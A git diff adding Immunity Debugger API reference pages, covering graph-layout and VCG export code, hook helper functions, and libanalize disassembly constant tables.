881 edgelist . append ( ( tx2 , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
882 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
883 if ty2 < y2ch :
+
884 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
885 else :
+
886 edgelist . append ( ( tx2 , ty2 , tx2 , y2ch - 2 , color ) )
+
887 else :
+
888 edgelist . append ( ( parentw * 3 / 4 + x + chaosmov , parenth + y - 1 , parentw * 3 / 4 + x + chaosmov , ych - 2 - 25 + chaosmov , "red" ) )
+
889 edgelist = searchForDummyPathsH2South ( edgelist , vertices )
+
890 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
891 edgelist . append ( ( tx , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
892 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
893 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
894 edgelist = searchForDummyPathsH2South ( edgelist , vertices )
+
895
+
896 addEndPointToEdge ( edgelist )
+
897
+
898
+
899
+
900
+
901
+
902
+
903 elif child [ 1 ] == 0 :
+
904 for vertexchild in vertices :
+
905 if child [ 0 ] == vertexchild . getName ( ) :
+
906 if vertex . getName ( ) == vertexchild . getName ( ) :
+
907
+
908 debugger . Error ( "loop direct" )
+
909 else :
+
910 ( xch , ych , x2ch , y2ch ) = vertexchild . getCoords ( )
+
911 f . write ( "Edge direct from %s (%d,%d,%d,%d) to %s (%d,%d,%d,%d)\n" % ( vertex . getName ( ) , x , y , x2 , y2 , vertexchild . getName ( ) , xch , ych , x2ch , y2ch ) )
+
912 chaosmov = randint ( - 5 , 5 )
+
913 chaosmovlastx = randint ( - 20 , 20 )
+
914 childw = vertexchild . getWidth ( )
+
915 if ( parenth + y - 1 ) > ych - 2 - 25 :
+
916 edgelist . append ( ( parentw * 1 / 2 + x + chaosmov , parenth + y - 1 , parentw * 1 / 2 + x + chaosmov , parenth + y + 5 , "Blue" ) )
+
917 edgelist . append ( ( parentw * 1 / 2 + x + chaosmov , parenth + y + 5 , x - 10 , parenth + y + 5 , "Blue" ) )
+
918 edgelist . append ( ( x - 10 , parenth + y + 5 , x - 10 , ych - 2 - 20 + chaosmov , "Blue" ) )
+
919 edgelist = searchForDummyPathsH2North ( edgelist , vertices )
+
920 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
921 edgelist . append ( ( tx2 , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
922 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
923 if ty2 < y2ch :
+
924 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
925 else :
+
926 edgelist . append ( ( tx2 , ty2 , tx2 , y2ch - 2 , color ) )
+
927
+
928 else :
+
929 edgelist . append ( ( parentw * 1 / 2 + x + chaosmov , parenth + y - 1 , parentw * 1 / 2 + x + chaosmov , ych - 2 - 25 + chaosmov , "Black" ) )
+
930 edgelist = searchForDummyPathsH2South ( edgelist , vertices )
+
931 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
932 edgelist . append ( ( tx , ty2 , xch + ( childw * 1 / 2 ) + chaosmov , ty2 , color ) )
+
933 ( tx , ty , tx2 , ty2 , color ) = edgelist [ - 1 ]
+
934 edgelist . append ( ( tx2 , ty2 , tx2 , ych - 2 , color ) )
+
935
+
936
+
937
+
938
+
939 addEndPointToEdge ( edgelist )
+
940
+
941
+
942
+
943 return edgelist
+
944
+
946 ( endx , endy , endx2 , endy2 , color ) = edgelist [ - 1 ]
+
947 edgelist . append ( ( endx2 , endy2 , endx2 , endy2 + 2 , color ) )
+
948 edgelist . append ( ( endx2 , endy2 , endx2 , endy2 - 2 , color ) )
+
949 edgelist . append ( ( endx2 , endy2 + 2 , endx2 + 2 , endy2 + 2 , color ) )
+
950 edgelist . append ( ( endx2 , endy2 + 2 , endx2 - 2 , endy2 + 2 , color ) )
+
951 edgelist . append ( ( endx2 + 2 , endy2 - 2 , endx2 + 2 , endy2 + 3 , color ) )
+
952 edgelist . append ( ( endx2 - 2 , endy2 - 2 , endx2 - 2 , endy2 + 3 , color ) )
+
953 edgelist . append ( ( endx2 - 2 , endy2 - 2 , endx2 + 2 , endy2 - 2 , color ) )
+
954
+
955 return edgelist
+
956
+
971
+
973 for line in edgelist :
+
974 linej = graphclass . Line ( handler )
+
975 x_pos = line [ 0 ]
+
976 y_pos = line [ 1 ]
+
977 x_to = line [ 2 ]
+
978 y_to = line [ 3 ]
+
979 color = line [ 4 ]
+
980 linej . draw ( x_pos , y_pos , x_to , y_to , color )
+
981 return
+
982
+ 983
+ 984
+
986 """ creates a directed adjacency list for every vertex """
+
987 for edge in edges :
+
988 source = edge [ 'sourcename:' ]
+
989 target = edge [ 'targetname:' ]
+
990
+
991 type = 0
+
992 if 'label:' in edge :
+
993 if 'TRUE' in edge [ 'label:' ] . upper ( ) :
+
994 type = 1
+
995 if 'FALSE' in edge [ 'label:' ] . upper ( ) :
+
996 type = 2
+
997
+
998 G . addEdges ( ( source , target , type ) )
+
999
+
1000 for vertex in vertices :
+
1001 if vertex . getName ( ) == source :
+
1002 vertex . addOutAdj ( target , type )
+
1003 if vertex . getName ( ) == target :
+
1004 vertex . addInAdj ( source )
+
1005 return
+
1006
+1007
+1008
+1009
+1010
+1011
+1012
+1013
+1014
+1015
+1016
+1017
+1018
+1019
+1020
+1021
+1022
+1023
+1024
+1025
+1026
+1027
+1028
+1029
+
1031
+
1032
+
1033
+
1034 return
+
1035
+
1037 """First attempt to place vertices
+
1038 We are going to suppose Graph is planar and
+
1039 attempt to place vertices directly,
+
1040 in real world this wont happens, but at least
+
1041 we'll have temptative coords for every vertex"""
+
1042
+
1043 for vertex in vertices :
+
1044 if vertices . index ( vertex ) == 0 :
+
1045 ( x , y ) = vertex . getStartCoords ( )
+
1046 vertex . setRelPos ( x , y )
+
1047 ( x , y , x2 , y2 ) = vertex . getCoords ( )
+
1048 vertex . setPlaced ( )
+
1049 ( x , y ) = vertex . getRelPos ( )
+
1050
+
1051 outadj = vertex . getOutAdj ( )
+
1052
+
1053 if len ( outadj ) > 0 :
+
1054 for child in outadj :
+
1055 if child [ 1 ] == 1 :
+
1056 for vertexchild in vertices :
+
1057 if child [ 0 ] == vertexchild . getName ( ) and vertexchild . isPlaced ( ) == False :
+
1058 ( xp , yp ) = vertex . getRelPos ( )
+
1059 if xp == 0 :
+
1060
+
1061 """Note: usually we dont want to go back from Point of No Return,
+
1062 but in this special case of vertex, we need to do it.
+
1063 we should have in mind, that overlapping might occur, but we wont move south , instead
+
1064 we need to move east/west"""
+
1065 inadj = vertex . getInAdj ( )
+
1066 for parent in inadj :
+
1067 for parentvertex in vertices :
+
1068 if parent == parentvertex . getName ( ) :
+
1069 ( xp , yp ) = parentvertex . getRelPos ( )
+
1070 y = yp + parentvertex . getHeight ( ) + 55
+
1071 x = xp - ( parentvertex . getWidth ( ) * 0.75 )
+
1072 x = xp - 100
+
1073 vertexchild . setRelPos ( x , y )
+
1074
+
1075 vertexchild . setPlaced ( )
+
1076 else :
+
1077
+
1078 y = yp + vertex . getHeight ( ) + 55
+
1079
+
1080 x = xp - 100
+
1081 vertexchild . setRelPos ( x , y )
+
1082 checkForPlacedVertex ( vertexchild , vertices )
+
1083 vertexchild . setPlaced ( )
+
1084
+
1085
+
1086 elif child [ 1 ] == 2 :
+
1087 for vertexchild in vertices :
+
1088 if child [ 0 ] == vertexchild . getName ( ) and vertexchild . isPlaced ( ) == False :
+
1089 ( xp , yp ) = vertex . getRelPos ( )
+
1090 if xp == 0 :
+
1091 """special case"""
+
1092
+
1093 inadj = vertex . getInAdj ( )
+
1094
+
1095 for parent in inadj :
+
1096 for parentvertex in vertices :
+
1097 if parent == parentvertex . getName ( ) :
+
1098 ( xp , yp ) = parentvertex . getRelPos ( )
+
1099 y = yp + parentvertex . getHeight ( ) + 15
+
1100
+
1101 x = xp + parentvertex . getWidth ( ) + 50
+
1102 vertexchild . setRelPos ( x , y )
+
1103
+
1104 vertexchild . setPlaced ( )
+
1105
+
1106 else :
+
1107 y = yp + vertex . getHeight ( ) + 55
+
1108
+
1109 x = xp + vertex . getWidth ( ) + 50
+
1110 vertexchild . setRelPos ( x , y )
+
1111 checkForPlacedVertex ( vertexchild , vertices )
+
1112 vertexchild . setPlaced ( )
+
1113
+
1114
+
1115
+
1116 if child [ 1 ] == 0 :
+
1117 for vertexchild in vertices :
+
1118 if child [ 0 ] == vertexchild . getName ( ) and vertexchild . isPlaced ( ) == False :
+
1119 ( xp , yp ) = vertex . getRelPos ( )
+
1120 if xp == 0 :
+
1121 """special case"""
+
1122
+
1123 inadj = vertex . getInAdj ( )
+
1124
+
1125 for parent in inadj :
+
1126 for parentvertex in vertices :
+
1127 if parent == parentvertex . getName ( ) :
+
1128 ( xp , yp ) = parentvertex . getRelPos ( )
+
1129 y = yp + parentvertex . getHeight ( ) + 55
+
1130 x = xp + ( parentvertex . getWidth ( ) / 2 )
+
1131 vertexchild . setRelPos ( x , y )
+
1132
+
1133 vertexchild . setPlaced ( )
+
1134
+
1135
+
1136 else :
+
1137 y = yp + vertex . getHeight ( ) + 55
+
1138 x = xp + ( vertex . getWidth ( ) / 2 )
+
1139 vertexchild . setRelPos ( x , y )
+
1140 checkForPlacedVertex ( vertexchild , vertices )
+
1141 vertexchild . setPlaced ( )
+
1142
+
1143
+
1144
+
1145 return
+
1146
+1147
+1148
+1149
+1150
+
1152
+
1153 """Note: needs to divide graph in layers
+
1154
+
1155 Draft notes:
+
1156 step 1 get temptative coords to place vertex
+
1157 step 2 check if coords overlaps already placed vertex
+
1158
+
1159 step 2 a)
+
1160 first we have to check if (y,y2) of vertex is in range of the placed vertex,
+
1161
+
1162 if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+
1163
+
1164 if that condition is true, means we have a vertex in the same y that an already placed vertex, so it might be
+
1165 possible of an overlapping to exists, so we are going to ask:
+
1166
+
1167 if x >= xp and x <= x2p:
+
1168 if that condition is true, then we have an overlapping over the y coord of the vertex (left point)
+
1169
+
1170 if x2 >= xp and x <= x2p:
+
1171 if that condition is true, then we have an overlapping over the y coord of the vertex (right point)
+
1172
+
1173 and if does, check whether x or x2 is overlapping
+
1174 once we know that, we need to check wheter x or x2 of overlapped vertex is touched
+
1175 if x , move west x - 10 and recheck
+
1176 """
+
1177 ret = False
+
1178 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1179 for vertex in vertices :
+
1180 if vertex . getName ( ) == vertex2check . getName ( ) :
+
1181 pass
+
1182 else :
+
1183 if 1 == 1 :
+
1184 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1185 if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p :
+
1186
+
1187 if x >= xp and x <= x2p :
+
1188
+
1189 vertex2check . moveSouth ( y2p - y + 25 )
+
1190 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1191 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1192 ret = True
+
1193 if x2 >= xp and x <= x2p :
+
1194
+
1195 vertex2check . moveSouth ( y2p - y + 25 )
+
1196 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1197 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1198 ret = True
+
1199 return ret
+
1200
+
1202
+
1203 """Note: needs to divide graph in layers
+
1204
+
1205 Draft notes:
+
1206 step 1 get temptative coords to place vertex
+
1207 step 2 check if coords overlaps already placed vertex
+
1208
+
1209 step 2 a)
+
1210 first we have to check if (y,y2) of vertex is in range of the placed vertex,
+
1211
+
1212 if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+
1213
+
1214 if that condition is true, means we have a vertex in the same y that an already placed vertex, so it might be
+
1215 possible of an overlapping to exists, so we are going to ask:
+
1216
+
1217 if x >= xp and x <= x2p:
+
1218 if that condition is true, then we have an overlapping over the y coord of the vertex (left point)
+
1219
+
1220 if x2 >= xp and x <= x2p:
+
1221 if that condition is true, then we have an overlapping over the y coord of the vertex (right point)
+
1222
+
1223 and if does, check whether x or x2 is overlapping
+
1224 once we know that, we need to check wheter x or x2 of overlapped vertex is touched
+
1225 if x , move west x - 10 and recheck
+
1226 """
+
1227 ret = False
+
1228 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1229 for vertex in vertices :
+
1230 if vertex . getName ( ) == vertex2check . getName ( ) :
+
1231 pass
+
1232 else :
+
1233 if 1 == 1 :
+
1234 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1235 if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p :
+
1236 immlib . Error ( "%s and %s are in the same x range" % ( vertex . getName ( ) , vertex2check . getName ( ) ) )
+
1237 if x >= xp and x <= x2p :
+
1238 immlib . Error ( "%s and %s overlaps LEFT: %d" % ( vertex . getName ( ) , vertex2check . getName ( ) , x2p - x ) )
+
1239 vertex2check . moveSouth ( 20 )
+
1240 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1241 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1242 ret = True
+
1243 if x2 >= xp and x <= x2p :
+
1244 vertex2check . moveSouth ( 20 )
+
1245 immlib . Error ( "%s and %s overlaps RIGHT" % ( vertex . getName ( ) , vertex2check . getName ( ) ) )
+
1246 ( xp , yp , x2p , y2p ) = vertex . getCoords ( )
+
1247 ( x , y , x2 , y2 ) = vertex2check . getCoords ( )
+
1248 ret = True
+
1249 return ret
+
1250
+1251
+
1253
+
1254
+
1255
+
1256
+
1257
+
1258
+
1259
+
1260
+
1261 return
+
1262
+1263
+
1265 """ this function will generate a vcg compatible buffer to create the graph """
+
1266 imm = immlib . Debugger ( )
+
1267 ret = imm . getFunctionBegin ( address )
+
1268 if ret :
+
1269 address = ret
+
1270 f = imm . getFunction ( address )
+
1271 buf = [ ]
+
1272 buf . append ( 'graph: {\x0d\x0a' )
+
1273 buf . append ( 'title: "Graph of %s (0x%08x)"\r\n' % ( f . getName ( ) , int ( f . start ) ) )
+
1274 buf . append ( "//default palette\r\n" )
+
1275
+
1276 buf += PALETTE
+
1277 basicblocks = f . getBasicBlocks ( )
+
1278 basicblocks . sort ( )
+
1279
+
1280 buf . append ( 'node: { title: "0x%08x" vertical_order: 0 label: "\x0c69%s (0x%08x):\x0c31\r\n' % ( int ( basicblocks [ 0 ] . start ) , f . getName ( ) , int ( f . start ) ) )
+
1281 instr = basicblocks [ 0 ] . getInstructions ( imm )
+
1282 for i in instr :
+
1283 if len ( i . comment ) > 0 :
+
1284 buf . append ( "%s || %s\r\n" % ( i . result , i . comment . replace ( "\"" , "" ) ) )
+
1285 else :
+
1286 buf . append ( "%s\r\n" % i . result )
+
1287 buf . append ( "\"" )
+
1288
+
1289
+
1290
+
1291 for a in range ( 1 , len ( basicblocks ) ) :
+
1292 buf . append ( " }\n" )
+
1293 buf . append ( 'node: { title: "0x%08x" label: "\x0c69 0x%08x\x0c31\n' % ( int ( basicblocks [ a ] . start ) , int ( basicblocks [ a ] . start ) ) )
+
1294 instr = basicblocks [ a ] . getInstructions ( imm )
+
1295 for i in instr :
+
1296 if len ( i . comment ) > 0 :
+
1297 buf . append ( "%s || %s\r\n" % ( i . result , i . comment . replace ( "\"" , "" ) ) )
+
1298 else :
+
1299 buf . append ( "%s\r\n" % i . result )
+
1300
+
1301 buf . append ( '"\r\n' )
+
1302
+
1303 buf . append ( "}\r\n" )
+
1304
+
1305 buf . append ( "//nodes edges\r\n" )
+
1306 for a in range ( 0 , len ( basicblocks ) - 1 ) :
+
1307 ( true , false ) = basicblocks [ a ] . getEdges ( )
+
1308 if false != 0 :
+
1309 buf . append ( 'edge: { sourcename: "0x%08x" targetname: "0x%08x" label: "false" color: red }\r\n' % ( int ( basicblocks [ a ] . start ) , int ( basicblocks [ a ] . end ) ) )
+
1310 buf . append ( 'edge: { sourcename: "0x%08x" targetname: "0x%08x" label: "true" color: darkgreen }\r\n' % ( int ( basicblocks [ a ] . start ) , int ( true ) ) )
+
1311 else :
+
1312 buf . append ( 'edge: { sourcename: "0x%08x" targetname: "0x%08x" }\r\n' % ( int ( basicblocks [ a ] . start ) , int ( true ) ) )
+
1313 buf . append ( "\n}\r\n" )
+
1314 return buf
+
1315
+1316
+
1318 vcg_buf = generateVCG ( address )
+
1319 if len ( vcg_buf ) > 0 :
+
1320 fd = open ( filename , "wb" )
+
1321 for a in vcg_buf :
+
1322 fd . write ( a )
+
1323 fd . close ( )
+
1324 else :
+
1325 debugger . Error ( "There is no VCG graph" )
+
1326
+1327
+1328 if __name__ == "__main__" : 1329 main ( )
+1330
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immvcglib.ParseVCGList-class.html b/1.73/Documentation/Ref/Libs.immvcglib.ParseVCGList-class.html
new file mode 100755
index 0000000..b7a7829
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immvcglib.ParseVCGList-class.html
@@ -0,0 +1,239 @@
+
+
+
+
+ Libs.immvcglib.ParseVCGList
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immvcglib ::
+ Class ParseVCGList
+
+
+
+
+
+
+
+
+Class ParseVCGList source code
+recursive VCG parser
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ vcgList )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ error (self ,
+ error )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ reParse (self ,
+ vcgItems ,
+ mode =''
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Parse a VCG graph .. not 100% proper .. but proper enough
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immvcglib.graphTree-class.html b/1.73/Documentation/Ref/Libs.immvcglib.graphTree-class.html
new file mode 100755
index 0000000..b113780
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immvcglib.graphTree-class.html
@@ -0,0 +1,241 @@
+
+
+
+
+ Libs.immvcglib.graphTree
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class graphTree source code
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ address ,
+ imm )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ orderNodesFromTree (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ makeNode (self ,
+ title ,
+ content =''vertical_order =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ makeEdge (self ,
+ source ,
+ target ,
+ label =''color ='green'
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ makeVCG (self ,
+ title ,
+ nodes =[]edges =[]
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ graphCallTree (self )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.internals-module.html b/1.73/Documentation/Ref/Libs.internals-module.html
new file mode 100755
index 0000000..c55b04b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.internals-module.html
@@ -0,0 +1,209 @@
+
+
+
+
+ Libs.internals
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module internals
+
+
+
+
+
+
+
+
+Module internals source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+ Internal libs
+
+
+
+
+
+
+
+
+
+
+ hookmain (pickled_hook ,
+ regs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ hookmaintimeout (pickled_hook ,
+ regs )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.0'
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.internals-pysrc.html b/1.73/Documentation/Ref/Libs.internals-pysrc.html
new file mode 100755
index 0000000..8a8c9e4
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.internals-pysrc.html
@@ -0,0 +1,171 @@
+
+
+
+
+ Libs.internals
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module internals
+
+
+
+
+
+
+
+
+
+ 1
+ 2 """ 3 (c) Immunity, Inc. 2004-2007 4 5 6 U{Immunity Inc.<http://www.immunityinc.com>} 7 8 9 Internal libs 10 11 12 """ 13
+14 __VERSION__ = '1.0' 15
+16 import pickle 17 import immlib 18
+19
+20
+21
+22 - def hookmain ( pickled_hook , regs ) :
+
23 """Auxiliar hook function
+
24 get pickled hook instance and execute run()"""
+
25 imm = immlib . Debugger ( )
+
26 hook = pickle . loads ( pickled_hook )
+
27 if hook . enabled == True :
+
28 hook . _run ( regs )
+
29
+30
+31 - def hookmaintimeout ( pickled_hook , regs ) :
+
32 """Auxiliar hook function
+
33 get pickled hook instance and execute runtimeout()"""
+
34 imm = immlib . Debugger ( )
+
35 hook = pickle . loads ( pickled_hook )
+
36 if hook . enabled == True :
+
37 hook . _runTimeout ( regs )
+
38
+39
+40
+41
+
46
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize-module.html b/1.73/Documentation/Ref/Libs.libanalize-module.html
new file mode 100755
index 0000000..867869a
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize-module.html
@@ -0,0 +1,1852 @@
+
+
+
+
+ Libs.libanalize
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libanalize
+
+
+
+
+
+
+
+
+Module libanalize source code (c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+ __VERSION__ = '1.3'
+
+
+
+
+
+
+ RST_INVALID = 0
+
+
+
+
+
+
+ RST_VALUE = 1
+
+
+
+
+
+
+ RST_VFIXUP = 2
+
+
+
+
+
+
+ RST_INDIRECT = 3
+
+
+
+
+
+
+ DISASM_SIZE = 0
+
+
+
+
+
+
+ DISASM_DATA = 1
+
+
+
+
+
+
+ DISASM_TRACE = 2
+
+
+
+
+
+
+ DISASM_FILE = 3
+
+
+
+
+
+
+ DISASM_CODE = 4
+
+
+
+
+
+
+ DISASM_ALL = 5
+
+
+
+
+
+
+ DISASM_RTRACE = 6
+
+
+
+
+
+
+ C_TYPEMASK = 240
+
+
+
+
+
+
+ C_CMD = 0
+
+
+
+
+
+
+ C_PSH = 16
+
+
+
+
+
+
+ C_POP = 32
+
+
+
+
+
+
+ C_MMX = 48
+
+
+
+
+
+
+ C_FLT = 64
+
+
+
+
+
+
+ C_JMP = 80
+
+
+
+
+
+
+ C_JMC = 96
+
+
+
+
+
+
+ C_CAL = 112
+
+
+
+
+
+
+ C_RET = 128
+
+
+
+
+
+
+ C_FLG = 144
+
+
+
+
+
+
+ C_RTF = 160
+
+
+
+
+
+
+ C_REP = 176
+
+
+
+
+
+
+ C_PRI = 192
+
+
+
+
+
+
+ C_SSE = 208
+
+
+
+
+
+
+ C_NOW = 224
+
+
+
+
+
+
+ C_BAD = 240
+
+
+
+
+
+
+ DEC_TYPEMASK = 31
+
+
+
+
+
+
+ DEC_UNKNOWN = 0
+
+
+
+
+
+
+ DEC_BYTE = 1
+
+
+
+
+
+
+ DEC_WORD = 2
+
+
+
+
+
+
+ DEC_NEXTDATA = 3
+
+
+
+
+
+
+ DEC_DWORD = 4
+
+
+
+
+
+
+ DEC_FLOAT4 = 5
+
+
+
+
+
+
+ DEC_FWORD = 6
+
+
+
+
+
+
+ DEC_FLOAT8 = 7
+
+
+
+
+
+
+ DEC_QWORD = 8
+
+
+
+
+
+
+ DEC_FLOAT10 = 9
+
+
+
+
+
+
+ DEC_TBYTE = 10
+
+
+
+
+
+
+ DEC_STRING = 11
+
+
+
+
+
+
+ DEC_UNICODE = 12
+
+
+
+
+
+
+ DEC_3DNOW = 13
+
+
+
+
+
+
+ DEC_SSE = 14
+
+
+
+
+
+
+ DEC_TEXT = 16
+
+
+
+
+
+
+ DEC_BYTESW = 17
+
+
+
+
+
+
+ DEC_NEXTCODE = 19
+
+
+
+
+
+
+ DEC_COMMAND = 29
+
+
+
+
+
+
+ DEC_JMPDEST = 30
+
+
+
+
+
+
+ DEC_CALLDEST = 31
+
+
+
+
+
+
+ DEC_PROCMASK = 96
+
+
+
+
+
+
+ DEC_PROC = 32
+
+
+
+
+
+
+ DEC_PBODY = 64
+
+
+
+
+
+
+ DEC_PEND = 96
+
+
+
+
+
+
+ DEC_CHECKED = 128
+
+
+
+
+
+
+ DEC_SIGNED = 256
+
+
+
+
+
+
+ DECR_TYPEMASK = 63
+
+
+
+
+
+
+ DECR_BYTE = 33
+
+
+
+
+
+
+ DECR_WORD = 34
+
+
+
+
+
+
+ DECR_DWORD = 36
+
+
+
+
+
+
+ DECR_QWORD = 40
+
+
+
+
+
+
+ DECR_FLOAT10 = 41
+
+
+
+
+
+
+ DECR_SEG = 42
+
+
+
+
+
+
+ DECR_3DNOW = 45
+
+
+
+
+
+
+ DECR_SSE = 46
+
+
+
+
+
+
+ DECR_ISREG = 32
+
+
+
+
+
+
+ DEC_CONST = 64
+
+
+
+
+
+
+ RegisterName = {(0, 0, 0, 0, 1, 0, 0, 0): 'ESP', (0, 0, 1, 0, 0, 0,...
+
+
+
+
+
+
+ COUNT = 100
+
+
+
+
+
+
+
+ __VERSION__
+ None
+
+ Value:
+
+
+
+
+ RST_INVALID
+ None
+
+ Value:
+
+
+
+
+ RST_VALUE
+ None
+
+ Value:
+
+
+
+
+ RST_VFIXUP
+ None
+
+ Value:
+
+
+
+
+ RST_INDIRECT
+ None
+
+ Value:
+
+
+
+
+ DISASM_SIZE
+ None
+
+ Value:
+
+
+
+
+ DISASM_DATA
+ None
+
+ Value:
+
+
+
+
+ DISASM_TRACE
+ None
+
+ Value:
+
+
+
+
+ DISASM_FILE
+ None
+
+ Value:
+
+
+
+
+ DISASM_CODE
+ None
+
+ Value:
+
+
+
+
+ DISASM_ALL
+ None
+
+ Value:
+
+
+
+
+ DISASM_RTRACE
+ None
+
+ Value:
+
+
+
+
+ C_TYPEMASK
+ None
+
+ Value:
+
+
+
+
+ C_CMD
+ None
+
+ Value:
+
+
+
+
+ C_PSH
+ None
+
+ Value:
+
+
+
+
+ C_POP
+ None
+
+ Value:
+
+
+
+
+ C_MMX
+ None
+
+ Value:
+
+
+
+
+ C_FLT
+ None
+
+ Value:
+
+
+
+
+ C_JMP
+ None
+
+ Value:
+
+
+
+
+ C_JMC
+ None
+
+ Value:
+
+
+
+
+ C_CAL
+ None
+
+ Value:
+
+
+
+
+ C_RET
+ None
+
+ Value:
+
+
+
+
+ C_FLG
+ None
+
+ Value:
+
+
+
+
+ C_RTF
+ None
+
+ Value:
+
+
+
+
+ C_REP
+ None
+
+ Value:
+
+
+
+
+ C_PRI
+ None
+
+ Value:
+
+
+
+
+ C_SSE
+ None
+
+ Value:
+
+
+
+
+ C_NOW
+ None
+
+ Value:
+
+
+
+
+ C_BAD
+ None
+
+ Value:
+
+
+
+
+ DEC_TYPEMASK
+ None
+
+ Value:
+
+
+
+
+ DEC_UNKNOWN
+ None
+
+ Value:
+
+
+
+
+ DEC_BYTE
+ None
+
+ Value:
+
+
+
+
+ DEC_WORD
+ None
+
+ Value:
+
+
+
+
+ DEC_NEXTDATA
+ None
+
+ Value:
+
+
+
+
+ DEC_DWORD
+ None
+
+ Value:
+
+
+
+
+ DEC_FLOAT4
+ None
+
+ Value:
+
+
+
+
+ DEC_FWORD
+ None
+
+ Value:
+
+
+
+
+ DEC_FLOAT8
+ None
+
+ Value:
+
+
+
+
+ DEC_QWORD
+ None
+
+ Value:
+
+
+
+
+ DEC_FLOAT10
+ None
+
+ Value:
+
+
+
+
+ DEC_TBYTE
+ None
+
+ Value:
+
+
+
+
+ DEC_STRING
+ None
+
+ Value:
+
+
+
+
+ DEC_UNICODE
+ None
+
+ Value:
+
+
+
+
+ DEC_3DNOW
+ None
+
+ Value:
+
+
+
+
+ DEC_SSE
+ None
+
+ Value:
+
+
+
+
+ DEC_TEXT
+ None
+
+ Value:
+
+
+
+
+ DEC_BYTESW
+ None
+
+ Value:
+
+
+
+
+ DEC_NEXTCODE
+ None
+
+ Value:
+
+
+
+
+ DEC_COMMAND
+ None
+
+ Value:
+
+
+
+
+ DEC_JMPDEST
+ None
+
+ Value:
+
+
+
+
+ DEC_CALLDEST
+ None
+
+ Value:
+
+
+
+
+ DEC_PROCMASK
+ None
+
+ Value:
+
+
+
+
+ DEC_PROC
+ None
+
+ Value:
+
+
+
+
+ DEC_PBODY
+ None
+
+ Value:
+
+
+
+
+ DEC_PEND
+ None
+
+ Value:
+
+
+
+
+ DEC_CHECKED
+ None
+
+ Value:
+
+
+
+
+ DEC_SIGNED
+ None
+
+ Value:
+
+
+
+
